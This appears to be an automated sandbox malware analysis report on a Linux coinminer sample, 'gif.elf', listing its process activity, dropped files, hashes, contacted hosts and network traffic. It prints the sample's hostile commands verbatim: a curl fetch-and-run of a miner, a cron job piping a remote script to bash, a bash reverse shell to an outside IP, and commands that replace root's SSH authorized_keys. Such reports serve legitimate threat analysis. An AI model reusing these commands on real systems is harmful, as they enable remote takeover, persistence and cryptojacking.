Source: /tmp/gif.elf (PID: 5500)Shell command executed: sh -c "chattr +i /etc/cron.hourly/prelink > /dev/null 2>&1"Jump to behavior
Source: /tmp/gif.elf (PID: 5502)Shell command executed: sh -c "chattr -ia -R /root/.ssh"Jump to behavior
Source: /tmp/gif.elf (PID: 5504)Shell command executed: sh -c "rm -rf /root/.ssh/authorized_keys"Jump to behavior
Source: /tmp/gif.elf (PID: 5506)Shell command executed: sh -c "chattr +i /root/.ssh/authorized_keys"Jump to behavior
Source: /tmp/gif.elf (PID: 5508)Shell command executed: sh -c "chattr -ia -R /root/.ssh"Jump to behavior
Source: /tmp/gif.elf (PID: 5510)Shell command executed: sh -c "rm -rf /root/.ssh/authorized_keys2"Jump to behavior
Source: /tmp/gif.elf (PID: 5512)Shell command executed: sh -c "chattr +i /root/.ssh/authorized_keys2"Jump to behavior
Source: /tmp/gif.elf (PID: 5514)Shell command executed: sh -c "curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner && chmod 755 /tmp/.miner && /tmp/.miner"Jump to behavior
Source: /tmp/gif.elf (PID: 5591)Shell command executed: sh -c "chattr -ia /tmp/python > /dev/null 2>&1 && rm -rf /tmp/python > /dev/null 2>&1"Jump to behavior
Source: /tmp/gif.elf (PID: 5593)Shell command executed: sh -c "chattr -ia chattr -ia /usr/bin/bsd-port/getty > /dev/null 2>&1 && rm -rf /usr/bin/bsd-port/getty > /dev/null 2>&1"Jump to behavior
Source: /tmp/gif.elf (PID: 5595)Shell command executed: sh -c "chattr -ia /usr/bin/.sshd > /dev/null 2>&1 && rm -rf /usr/bin/.sshd > /dev/null 2>&1"Jump to behavior
Source: /tmp/gif.elf (PID: 5597)Shell command executed: sh -c "chattr -ia /etc/rc.d/init.d/selinux > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/selinux > /dev/null 2>&1"Jump to behavior
Source: /tmp/gif.elf (PID: 5599)Shell command executed: sh -c "chattr -ia /etc/rc.d/init.d/DbSecuritySp > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/DbSecuritySpt > /dev/null 2>&1"Jump to behavior
Source: /tmp/gif.elf (PID: 5601)Shell command executed: sh -c "chattr -ia /usr/bin/sh.sh > /dev/null 2>&1 && rm -rf /usr/bin/sh.sh > /dev/null 2>&1"Jump to behavior
Source: /tmp/gif.elf (PID: 5603)Shell command executed: sh -c "chattr -ia /etc/cron.hourly/cron.sh > /dev/null 2>&1 && rm -rf /etc/cron.hourly/cron.sh > /dev/null 2>&1"Jump to behavior
Source: /tmp/gif.elf (PID: 5605)Shell command executed: sh -c "chattr -ia /lib/udev/udev /lib/udev/debug > /dev/null 2>&1 && rm -rf /lib/udev/udev /lib/udev/debug > /dev/null 2>&1"Jump to behavior
Source: /tmp/gif.elf (PID: 5607)Shell command executed: sh -c "chattr -ia /usr/bin/xrig > /dev/null 2>&1 && rm -rf /usr/bin/xrig 1> /dev/null 2>&1"Jump to behavior
Source: /tmp/gif.elf (PID: 5609)Shell command executed: sh -c "killall .sshd xrig getty > /dev/null 2>&1 "Jump to behavior
Source: /bin/sh (PID: 5499)Chmod executable: /usr/bin/chmod -> chmod 755 /etc/cron.hourly/prelinkJump to behavior
Source: /bin/sh (PID: 5515)Curl executable: /usr/bin/curl -> curl -fs http://w.softprojectcode.com/miner -o /tmp/.minerJump to behavior
Source: /bin/sh (PID: 5479)Rm executable: /usr/bin/rm -> rm -rf /root/.ssh/authorized_keys2Jump to behavior
Source: /bin/sh (PID: 5505)Rm executable: /usr/bin/rm -> rm -rf /root/.ssh/authorized_keysJump to behavior
Source: /bin/sh (PID: 5511)Rm executable: /usr/bin/rm -> rm -rf /root/.ssh/authorized_keys2Jump to behavior
Source: /usr/bin/chmod (PID: 5499)File: /etc/cron.hourly/prelink (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /usr/bin/curl (PID: 5515)File written: /tmp/.minerJump to dropped file
Source: /bin/sh (PID: 5492)Crontab like entry written: /etc/cron.d/watch
Source: /bin/sh (PID: 5493)Crontab like entry written: /etc/cron.d/watchJump to dropped file
Source: /bin/sh (PID: 5496)Writes shell script file to disk with an unusual file extension: /etc/cron.hourly/prelink

Hooking and other Techniques for Hiding and Protection

barindex
Source: /usr/bin/curl (PID: 5515)ELF file: /tmp/.minerJump to dropped file
Source: .miner.94.drDropped file: segment LOAD with 7.9983 entropy (max. 8.0)
Source: /usr/bin/curl (PID: 5515)Queries kernel information via 'uname': Jump to behavior
Source: /bin/sh (PID: 5477)Args: chattr -ia -R /root/.sshJump to behavior
Source: /bin/sh (PID: 5483)Args: chattr -ia -R /etc/cron.dJump to behavior
Source: /bin/sh (PID: 5485)Args: chattr -ia /etc/crontabJump to behavior
Source: /bin/sh (PID: 5487)Args: chattr -ia -R /var/spool/cronJump to behavior
Source: /bin/sh (PID: 5489)Args: chattr -ia -R /var/spool/cron/crontabsJump to behavior
Source: /bin/sh (PID: 5491)Args: chattr -ia -R /etc/cron.hourlyJump to behavior
Source: /bin/sh (PID: 5503)Args: chattr -ia -R /root/.sshJump to behavior
Source: /bin/sh (PID: 5509)Args: chattr -ia -R /root/.sshJump to behavior
Source: /bin/sh (PID: 5592)Args: chattr -ia /tmp/pythonJump to behavior
Source: /bin/sh (PID: 5594)Args: chattr -ia chattr -ia /usr/bin/bsd-port/gettyJump to behavior
Source: /bin/sh (PID: 5596)Args: chattr -ia /usr/bin/.sshdJump to behavior
Source: /bin/sh (PID: 5598)Args: chattr -ia /etc/rc.d/init.d/selinuxJump to behavior
Source: /bin/sh (PID: 5600)Args: chattr -ia /etc/rc.d/init.d/DbSecuritySpJump to behavior
Source: /bin/sh (PID: 5602)Args: chattr -ia /usr/bin/sh.shJump to behavior
Source: /bin/sh (PID: 5604)Args: chattr -ia /etc/cron.hourly/cron.shJump to behavior
Source: /bin/sh (PID: 5606)Args: chattr -ia /lib/udev/udev /lib/udev/debugJump to behavior
Source: /bin/sh (PID: 5608)Args: chattr -ia /usr/bin/xrigJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting		Valid Accounts1
Scheduled Task/Job		1
Scheduled Task/Job		1
Scheduled Task/Job		13
File and Directory Permissions Modification		1
OS Credential Dumping		1
Security Software Discovery		Remote ServicesData from Local System1
Ingress Tool Transfer		1
Exfiltration Over Alternative Protocol		1
Data Manipulation
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting		Boot or Logon Initialization Scripts11
Hidden Files and Directories		LSASS Memory1
File and Directory Discovery		Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
File Deletion		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1633056 Sample: gif.elf Startdate: 09/03/2025 Architecture: LINUX Score: 68 51 w.softprojectcode.com 192.186.12.50, 55378, 80 FEDERAL-ONLINE-GROUP-LLCUS United States 2->51 53 daisy.ubuntu.com 2->53 55 Multi AV Scanner detection for submitted file 2->55 10 gif.elf 2->10         started        signatures3 process4 process5 12 gif.elf 10->12         started        process6 14 gif.elf 12->14         started        file7 47 /root/.ssh/authorized_keys2, OpenSSH 14->47 dropped 49 /root/.ssh/authorized_keys, OpenSSH 14->49 dropped 17 gif.elf sh 14->17         started        19 gif.elf sh 14->19         started        21 gif.elf sh 14->21         started        25 29 other processes 14->25 process8 file9 27 sh curl 17->27         started        31 sh chmod 19->31         started        41 /etc/cron.d/watch, ASCII 21->41 dropped 57 Sample tries to persist itself using cron 21->57 43 /etc/cron.hourly/prelink, ASCII 25->43 dropped 33 sh chattr 25->33         started        35 sh chattr 25->35         started        37 sh chattr 25->37         started        39 23 other processes 25->39 signatures10 process11 file12 45 /tmp/.miner, ELF 27->45 dropped 59 Drops invisible ELF files 27->59 61 Sample tries to set files in /etc globally writable 31->61 63 Protects files from modification 33->63 65 Terminates several processes with shell command 'killall' 39->65 signatures13

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
gif.elf10%VirustotalBrowse
gif.elf8%ReversingLabsLinux.Coinminer.Generic

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://z.shavsl.com/b0%Avira URL Cloudsafe
http://w.softprojectcode.com/%s0%Avira URL Cloudsafe
http://w.softprojectcode.com/miner0%Avira URL Cloudsafe

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.25
truefalse
    		high
    w.softprojectcode.com
    		192.186.12.50
    		truefalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://w.softprojectcode.com/minerfalse
      • Avira URL Cloud: safe
      		unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://z.shavsl.com/bgif.elf, watch.48.dr, watch.50.drfalse
      • Avira URL Cloud: safe
      		unknown
      http://w.softprojectcode.com/%sgif.elffalse
      • Avira URL Cloud: safe
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      192.186.12.50
      		w.softprojectcode.comUnited States
      		395776FEDERAL-ONLINE-GROUP-LLCUSfalse

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      daisy.ubuntu.com.i.elfGet hashmaliciousUnknownBrowse
      • 162.213.35.25
      apep.arm.elfGet hashmaliciousUnknownBrowse
      • 162.213.35.24
      jaws.elfGet hashmaliciousUnknownBrowse
      • 162.213.35.25
      SecuriteInfo.com.Linux.Siggen.9999.21334.3171.elfGet hashmaliciousUnknownBrowse
      • 162.213.35.24
      SecuriteInfo.com.Linux.Siggen.9999.31985.32179.elfGet hashmaliciousUnknownBrowse
      • 162.213.35.24
      apep.arm5.elfGet hashmaliciousUnknownBrowse
      • 162.213.35.24
      SecuriteInfo.com.Linux.Siggen.9999.9757.27365.elfGet hashmaliciousUnknownBrowse
      • 162.213.35.25
      apep.mpsl.elfGet hashmaliciousUnknownBrowse
      • 162.213.35.24
      apep.arm6.elfGet hashmaliciousUnknownBrowse
      • 162.213.35.24
      w.softprojectcode.comgif.elfGet hashmaliciousXmrigBrowse
      • 107.167.34.74

      ASNs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      FEDERAL-ONLINE-GROUP-LLCUSnabmpsl.elfGet hashmaliciousUnknownBrowse
      • 192.250.200.80
      ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
      • 192.186.57.30
      zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
      • 192.186.57.30
      armv7l.elfGet hashmaliciousMiraiBrowse
      • 192.186.10.228
      print preview.jsGet hashmaliciousFormBookBrowse
      • 192.186.57.30
      1013911.jsGet hashmaliciousFormBookBrowse
      • 192.186.57.30
      la.bot.arm.elfGet hashmaliciousUnknownBrowse
      • 192.186.10.220
      vJSyCK4is2.elfGet hashmaliciousMiraiBrowse
      • 192.186.57.229
      12029.exeGet hashmaliciousGuLoaderBrowse
      • 192.186.7.211
      qmF3fz3Zn4.exeGet hashmaliciousGuLoaderBrowse
      • 192.186.7.211

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      Process:/bin/sh
      File Type:ASCII text
      Category:dropped
      Size (bytes):57
      Entropy (8bit):4.384064175252616
      Encrypted:false
      SSDEEP:3:9991KexA/FN3HLWUPGHFppkev:6exA/33HLDGnpkev
      MD5:6A0F0DC196D42B180C24DA7A372FCF05
      SHA1:3189560C64D1CE9030647A477C2B2C8CA180B937
      SHA-256:AA6124CA198DA79C50B97D98868F6769126DBB2F0CCAD0B0F85B6E1F2E903D95
      SHA-512:AF352C95566447CD1798A1C697AAE73920AA95F1E8AC6A48D61603EA2C2588E7440B111908A6D72C89744425C45066541871483D21A0D11434500EBB6A60560B
      Malicious:true
      Reputation:low
      Preview:0 2 * * * root wget -c http://z.shavsl.com/b -qO -|bash .
      Process:/bin/sh
      File Type:ASCII text
      Category:dropped
      Size (bytes):43
      Entropy (8bit):4.489877254551158
      Encrypted:false
      SSDEEP:3:lyMva6VK1XefLWUKT1:lfva6VK1Xee1
      MD5:F77E954ADACCF91A9A0CADE858336A4D
      SHA1:76073B74710DC6291EC882FBE771F1B38803E524
      SHA-256:D9D607BE4896C4EFD967BC034666A3907F3EF12DE9BECF91733DCF0EBE417CA2
      SHA-512:58D2B48D9EB8AFE9D50EC08B73DE4AEA57288194675739B5EDF6961EE5B999876B5938E11CCE9747E3689CF3E559AD9A62A7642E6EC24514145FEA953AD68E98
      Malicious:true
      Reputation:low
      Preview:bash -i >& /dev/tcp/45.125.66.31/8443 0>&1.
      Process:/tmp/gif.elf
      File Type:OpenSSH RSA public key
      Category:dropped
      Size (bytes):391
      Entropy (8bit):5.890545217406209
      Encrypted:false
      SSDEEP:6:2k0cAvgmfpQ5T26U5n4gQLgZ3AxgyxOYwFQhymEpgXkB/js0X+wJmMnYYj:4cWnpiH0VQLYAxhwY5hPQw2bsQdnYYj
      MD5:4968B16E23E6854F827539320EFDC6B3
      SHA1:BC6C9965E7D3651DD2E2E7798A74907D9CAD59FA
      SHA-256:E9E25CC3FD9285DA9E195BA601D76BA65DE6209487F0DA3B45F76FD31EFC44E1
      SHA-512:1CAF31C290C4F0EED7BCA6AD264F0C7D870104B75921410213F26348B0AFB22E9460045419FBD4613A32BBDD503E2608BB063B02F2117A454DCB3500355F09B7
      Malicious:true
      Reputation:low
      Preview:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtNw4sDrVPO1dELkT5ag+Wa5ewywgEGC6oQJ7ugP01cUJR+6UVnx6DipvZuqWFAkA9Zm7sJUrY6K430wFv82ZNWkbJOjcf1lhl4++njRt1vxwmTheSecwlDvk5fRf6086rm2HmmdvvsUsvSaowbDD23WNXfI3rAibluVhjNmqcFfLvB5DWO8E42zkq8jk1CWdM95D/mtDzCIrxbg/azBdfsXCU1hP8JvjAgDCkelc7NIesmT6ibG4uqeNg2IWiX/M0YG8T9hWoOHJasTl+Ub+gU34Imz21l9JJ66yQtD0GtgszFJBS4AelNSrVOjHEouR9Bx6AToB515nKJ7NEvGSz root@vps1.
      Process:/tmp/gif.elf
      File Type:OpenSSH RSA public key
      Category:dropped
      Size (bytes):782
      Entropy (8bit):5.890545217406209
      Encrypted:false
      SSDEEP:12:4cWnpiH0VQLYAxhwY5hPQw2bsQdnYYAFcWnpiH0VQLYAxhwY5hPQw2bsQdnYYj:R5pb/gNdSm5pb/gNdt
      MD5:9FA4780AFF535CC3ABFC28270A3DBAF5
      SHA1:202CB6C134B01506FA8B2E590A1700A8D3400A4F
      SHA-256:F4DD2F81E119FFC0C202DECFB28810154C607B6F1FBCA2021D4A9CB399CBA4BB
      SHA-512:1C6B6931589906DABC0CBE27B790CA23BAEADCA0BAA2D22B1D4CE8B4D98F5D01806A5A9B620908012B2057199B5C5C8B96C7B95A4E2EC0F0E963E4F7A43FA23B
      Malicious:true
      Reputation:low
      Preview:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtNw4sDrVPO1dELkT5ag+Wa5ewywgEGC6oQJ7ugP01cUJR+6UVnx6DipvZuqWFAkA9Zm7sJUrY6K430wFv82ZNWkbJOjcf1lhl4++njRt1vxwmTheSecwlDvk5fRf6086rm2HmmdvvsUsvSaowbDD23WNXfI3rAibluVhjNmqcFfLvB5DWO8E42zkq8jk1CWdM95D/mtDzCIrxbg/azBdfsXCU1hP8JvjAgDCkelc7NIesmT6ibG4uqeNg2IWiX/M0YG8T9hWoOHJasTl+Ub+gU34Imz21l9JJ66yQtD0GtgszFJBS4AelNSrVOjHEouR9Bx6AToB515nKJ7NEvGSz root@vps1.ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtNw4sDrVPO1dELkT5ag+Wa5ewywgEGC6oQJ7ugP01cUJR+6UVnx6DipvZuqWFAkA9Zm7sJUrY6K430wFv82ZNWkbJOjcf1lhl4++njRt1vxwmTheSecwlDvk5fRf6086rm2HmmdvvsUsvSaowbDD23WNXfI3rAibluVhjNmqcFfLvB5DWO8E42zkq8jk1CWdM95D/mtDzCIrxbg/azBdfsXCU1hP8JvjAgDCkelc7NIesmT6ibG4uqeNg2IWiX/M0YG8T9hWoOHJasTl+Ub+gU34Imz21l9JJ66yQtD0GtgszFJBS4AelNSrVOjHEouR9Bx6AToB515nKJ7NEvGSz root@vps1.
      Process:/usr/bin/curl
      File Type:ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, no section header
      Category:dropped
      Size (bytes):129687
      Entropy (8bit):7.998259484612439
      Encrypted:true
      SSDEEP:3072:ZhGZuPvqjVxcMQ1T+7dioPaxMCxfaCkOPdf3q4DK2sgWaUkWj:PQeswmwxMCxiCkOQ4DF1O/j
      MD5:8762E4ECB53B774CBBED8FDBE365D2F9
      SHA1:75BA7202050AF82DE5D53347D6E153C4F70F3CC5
      SHA-256:CA5FB6191109FCFF0C72C33D7BA9F306E9985532BDDCB93207184A6C83132A2A
      SHA-512:B1519A946544949ACAC8D392E1273D2AF58AD301E92B915FE9034ED8FD1615FE6B30BB42ADFD95B6D8D0FE5C1DEDEEA3CF0FF531E028F2F3383277061DBDF1DA
      Malicious:true
      Reputation:low
      Preview:.ELF..............>.......[.....@...................@.8...@.......................@.......@....................... .............`.......`.......`......................... .....)]..UPX!L.........K...K.X...k..........?.E.h=.....N.....e..U.....bo.G...y..$...pL.:rz3......{w.......`....A..h...T.NF%..FM.%j...k.>h#r.OH..R.........(:.M.1@.......7.NJ..........m..'..>.......J.T[...[.f=.....N..O(..)v...S._....#.;dq.2.7...}.p.D..o.B."...N.Z.~}l....:..O.&..HJ........5N.QQ...>...J....t^p........etq....d......}.,...7.E..T.lm.Q"2.x.}......Xv....E......R(N...t..9D*.u"..T.1..3.=.7.F...W....fB..a.jF.y.'..R..X,.X.....r,...%.F.u.....:.5!.kPd.qQ&../.V......G.....k.b..>lq...4..l..~Jp[..{q;4.....0i..!$.jDb...&...<...a......K...S. .......*3j6Z,..Zr^qH....i..FD./.0..Ho......L..]....:V...+K........]X.../.?...0..7...[....X1.m....<$.....I..O.Fo..I..^..se..t........l.............#cL...}v...?N.gT.I..kU..g...],..O....).?2.K^I3-)\.y...a..R.]...4.\>.w..E.xb...z[.'4..1..q.E.$...g.

      Static File Info

      General

      File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), too many section (64254)
      Entropy (8bit):4.084486346191242
      TrID:
      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
      File name:gif.elf
      File size:115'848 bytes
      MD5:4711254a232e4cbd4d98deb46e757f1d
      SHA1:93664323281e82fe36a847f785d6805891d20e42
      SHA256:1ce1b7de294df5c603d080376caf27f5f09ac16ba1ace7356e23e43db75ed60c
      SHA512:2bdfeec4aa204a6a6270db8334fbc5bf9fa8bb7e622fafb6348a4464a5772d89634187962abfb1ed1bca2fad6cb1046002a2d47f19a88a128ad5e8d9f0fc1c64
      SSDEEP:768:Xe4Cljck6kkQk7mkRBcmuhwhmRCh+oKhAg0gNuUfQHsC/0e3SYal23ErC1:XiRioCQCh+pAgwUfGsCsmil2Ur
      TLSH:54B34B43F0504CFAE899C9B8079B8525F6E3B0E51218376A33CCFA70671BF957619BA1
      File Content Preview:.ELF..............>.......@.....@...................@.8...@.......................@.......@.....$.......$......... .......................a.......a.....(.......P......... .....Q.td....................................................R.td..............a....

      Network Behavior

      Download Network PCAP: filteredfull

      TimestampSource PortDest PortSource IPDest IP
      Mar 9, 2025 17:28:10.394865990 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:28:10.400216103 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:28:10.400379896 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:28:10.400379896 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:28:10.405649900 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:28:34.594938993 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:28:34.594993114 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:28:34.595240116 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:28:34.595240116 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:28:58.882921934 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:28:58.882967949 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:28:58.883189917 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:28:58.883189917 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:28:59.319947004 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:28:59.320008993 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:28:59.320041895 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:28:59.320077896 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:28:59.320174932 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:28:59.320174932 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:28:59.320174932 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:28:59.320174932 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:00.087239027 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:00.087275028 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:00.087481022 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:00.087481022 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:00.875767946 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:00.875822067 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:00.875894070 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:00.875894070 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:01.067671061 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:01.067707062 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:01.067765951 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:01.067802906 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:01.067838907 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:01.067867994 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:01.067867994 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:01.067867994 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:01.067945004 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:01.067945004 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:01.259533882 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:01.259571075 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:01.259833097 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:01.259834051 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:01.696115971 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:01.696191072 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:01.696230888 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:01.696357965 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:01.696357965 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:01.696357965 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:02.618930101 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:02.619009018 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:02.619045973 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:02.619080067 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:02.619115114 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:02.619179010 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:02.619179010 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:02.619179010 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:02.619179010 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:02.619225979 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:03.890901089 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:03.890965939 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:03.891130924 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:03.891130924 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:04.128943920 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:04.128992081 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:04.129343987 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:04.129343987 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:06.538898945 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:06.538919926 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:06.538932085 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:06.538948059 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:06.539019108 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:06.539055109 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:06.539055109 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:06.539055109 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:06.730833054 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:06.730875969 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:06.730914116 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:06.730925083 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:06.730963945 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:06.730963945 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:10.350928068 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:10.350951910 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:10.351155996 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:10.351155996 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:11.260996103 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:11.261044979 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:11.261291027 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:11.261291027 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:11.460186958 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:11.460262060 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:11.460340023 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:11.460376024 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:11.460417032 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:11.460453033 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:11.460500002 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:11.460500002 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:11.460513115 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:11.460535049 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:11.644675970 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:11.644699097 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:11.644768000 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:11.644768000 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:12.106139898 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:12.106188059 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:12.106457949 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:12.106457949 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:13.224117041 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:13.224140882 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:13.224159002 CET8055378192.186.12.50192.168.2.13
      Mar 9, 2025 17:29:13.224313974 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:13.224356890 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:13.224356890 CET5537880192.168.2.13192.186.12.50
      Mar 9, 2025 17:29:15.266899109 CET8055378192.186.12.50192.168.2.13
